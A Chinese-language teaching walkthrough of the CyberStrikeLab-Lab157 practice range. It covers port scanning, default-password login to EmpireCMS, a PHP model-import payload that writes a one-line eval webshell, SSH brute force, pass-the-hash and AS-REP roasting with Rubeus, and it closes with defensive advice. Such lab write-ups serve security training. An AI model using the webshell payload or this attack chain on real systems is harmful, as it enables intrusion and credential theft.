CyberStrikeLab-Lab157靶场渗透测试教学文档

一、 靶场概述

本教学文档基于先知社区发布的“cyberstrikelab-lab157”靶场渗透测试实战记录。该靶场包含多个安全挑战，涉及信息收集、漏洞利用、权限提升和横向移动等多个渗透测试阶段。以下将详细拆解每个攻击路径的关键步骤和技术要点。

二、 信息收集与初始扫描

2.1 使用fscan进行端口与服务探测

攻击者首先使用fscan工具对目标IP172.20.5.5进行了全端口扫描（1-10000）。
命令：fscan.exe -h 172.20.5.5 -p 1-10000

扫描结果摘要：

• 22端口：开放，运行OpenSSH 7.4。
• 80端口：开放，运行Adminer（一个数据库管理工具），版本为4.6.2。
• 111端口：开放（rpcbind服务）。
• 3306端口：开放，运行MySQL，但配置了IP访问限制（Host '192.168.122.8' is not allowed to connect）。
• 6000端口：开放，服务未明确识别。
• 8001端口：开放，运行HTTP服务，经识别为“帝国网站管理系统”（EmpireCMS）。

2.2 Web应用指纹识别

• http://172.20.5.5:8001：网站标题为“帝国网站管理系统 - Powered by EmpireCMS”。
• http://172.20.5.5：网站标题为“登录 - Adminer”。

三、 漏洞利用与攻陷（Web路径）

3.1 路径一：利用Adminer (CVE-2021-43008)

1. 发现：80端口运行的Adminer版本为4.6.2。该版本存在CVE-2021-43008远程文件读取漏洞。
2. 尝试与结果：攻击者尝试复现此漏洞但未成功（文档中提示“尝试之后报错”）。因此转向其他攻击面。

3.2 路径二：攻击帝国CMS (EmpireCMS)

1. 后台发现与登录：访问http://172.20.5.5:8001/e/admin路径，发现帝国CMS后台登录入口。使用默认弱口令admin/admin123成功登录。
2. 利用“导入系统模型”功能上传Webshell：
   • 在后台找到“导入系统模型”功能。
   • 准备一个恶意模型文件1.php.mod，其内容为一段PHP代码，用于在服务器上写入一个Webshell文件getshell.php。

     <?php file_put_contents(“getshell.php”,“<?php @eval(\$_POST[cmd]); ?>”);?>
     

   • 在导入界面，随意填写表名，上传该.mod文件。
3. 获取Webshell：文件上传成功后，恶意代码被执行，在服务器根目录生成了包含一句话木马的getshell.php文件。
4. 连接与提权：使用“蚁剑”（AntSword）等Webshell管理工具连接http://172.20.5.5:8001/getshell.php，密码为cmd，成功获取服务器权限。
5. 获取Flag：在服务器上找到并读取Flag文件。

四、 内网横向移动（Web2路径）

4.1 建立代理与发现内网

1. 建立代理：在已控的Web服务器上配置代理，将攻击流量转发到内网。
2. 探测内网网段：执行ifconfig发现该服务器为双网卡，除原有172.20.5.0/24网段外，还连接到另一个内网网段（例如172.20.5.0/24的一个不同部分或另一个网段，文档未明确，但脚本针对172.20.5.1-254扫描）。
3. 编写脚本进行存活主机探测：使用简单的Shell脚本进行Ping扫描。

   #!/bin/sh
   i=1
   while [ $i -le 254 ]; do
     ping -c 1 172.20.5.$i
     i=`expr $i + 1`
   done
   

   将结果保存后分析，发现IP 172.20.5.9的主机存活，根据TTL=64判断其为Linux系统。

4.2 攻击Linux主机 (172.20.5.9)

1. 端口扫描：对172.20.5.9进行扫描，发现其开放了SSH（22）端口。
2. 弱口令爆破：使用SSH弱口令爆破工具（如Hydra, Medusa等）进行攻击，成功爆破出密码为password。
3. 登录并获取Flag：使用得到的凭证(username, password)通过SSH登录该Linux主机，在系统中找到并读取Flag文件。

五、 域渗透挑战（cslab & DC路径）

5.1 攻击主机 10.200.5.50 (cslab)

1. 发现主机：在内网探测中发现存活主机10.200.5.50。
2. 查看密码哈希：通过某种方式（可能利用已有权限或漏洞）查看了目标主机上的/etc/passwd和/etc/shadow（或SAM）文件，获取了用户密码哈希。
3. Pass-The-Hash (PTH) 攻击：使用获取的NTLM哈希进行PTH攻击，尝试横向移动。
4. 获取Flag：攻击成功，在目标主机上获得Flag。

5.2 攻击域控制器（DC）— AS-REP Roasting

1. 漏洞发现：在域环境中，发现存在AS-REP Roasting漏洞。该漏洞允许攻击者为不需要预认证的账户请求Kerberos TGT（票据授予票据），并离线破解其加密密钥（密码）。
2. 利用过程：
   • 在已控的Windows主机上，以域用户cyberstrike.lab\cslab身份运行命令提示符：runas /user:cyberstrike.lab\cslab cmd。
   • 使用Rubeus.exe工具执行AS-REP Roasting攻击：Rubeus.exe asreproast。该命令会输出可离线破解的用户哈希。
   • 将获取的哈希保存到文本文件中。
3. 离线破解哈希：
   • 对获取的哈希值（需要手动添加$23前缀，这是Kerberos 23号加密类型 rc4-hmac 的标识）使用密码破解工具（如Hashcat）进行爆破。
   • 成功破解出用户cslab的明文密码为P@ssw0rd。
4. 获取域控权限：使用破解得到的凭证 cslab:P@ssw0rd，通过RDP（远程桌面协议） 连接到域控制器。
5. 获取Flag：在域控制器上找到并读取最终的Flag。

六、 关键工具与技术总结

• 扫描工具：fscan（综合扫描器）。
• Webshell管理：蚁剑（AntSword）。
• 内网探测：Bash/PowerShell脚本、TTL值判断系统类型。
• 口令爆破：SSH弱口令爆破工具、Hashcat。
• 横向移动技术：Pass-The-Hash (PTH)。
• 域渗透技术：AS-REP Roasting（利用工具：Rubeus）。
• 漏洞利用：
  • Adminer 4.6.2 文件读取 (CVE-2021-43008) —— 本次未利用成功。
  • EmpireCMS 后台“导入系统模型”功能文件上传漏洞 —— 本次成功利用的关键。

七、 防御建议

1. 强化口令策略：杜绝使用默认口令和弱口令，对所有服务启用强密码。
2. 及时更新与补丁管理：及时更新如Adminer、EmpireCMS等所有公开组件的版本，修复已知漏洞。
3. 最小权限原则：数据库、后台管理等系统应严格限制访问IP，并遵循最小权限原则分配账户权限。
4. 输入验证与安全配置：对文件上传功能进行严格的白名单验证和内容检查。关闭Web应用不必要的功能模块。
5. 网络分段与监控：对内部网络进行合理分段，防止攻击者轻易进行横向移动。部署IDS/IPS并监控异常登录行为（如SSH/RDP爆破、PTH攻击）。
6. 域安全加固：在Active Directory中，为所有用户账户设置“需要Kerberos预认证”选项，防范AS-REP Roasting等Kerberos相关攻击。定期审核域内账户权限。

注：本教学文档完全基于提供的链接内容进行知识提取与整理。文中涉及的漏洞利用、攻击手法仅用于安全研究与教学目的，切勿用于非法活动。